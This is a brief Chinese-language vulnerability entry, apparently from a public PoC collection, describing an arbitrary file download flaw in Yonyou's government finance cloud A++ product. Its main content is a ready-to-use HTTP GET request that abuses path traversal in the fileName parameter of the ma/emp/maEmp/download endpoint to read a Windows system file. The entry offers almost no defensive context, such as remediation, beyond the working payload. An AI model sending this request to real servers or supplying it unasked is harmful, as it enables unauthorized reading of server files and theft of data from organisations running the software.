用友政务财务云A++ ma/emp/maEmp/download 任意文件下载漏洞

日期: 2024-05-09 | 影响软件: 用友政务财务云A++ | POC: 已公开

漏洞描述

用友政务财务云A++ ma/emp/maEmp/download 任意文件下载漏洞

PoC代码

GET /ma/emp/maEmp/download?fileName=../../../../../../../../../C://Windows//win.ini HTTP/1.1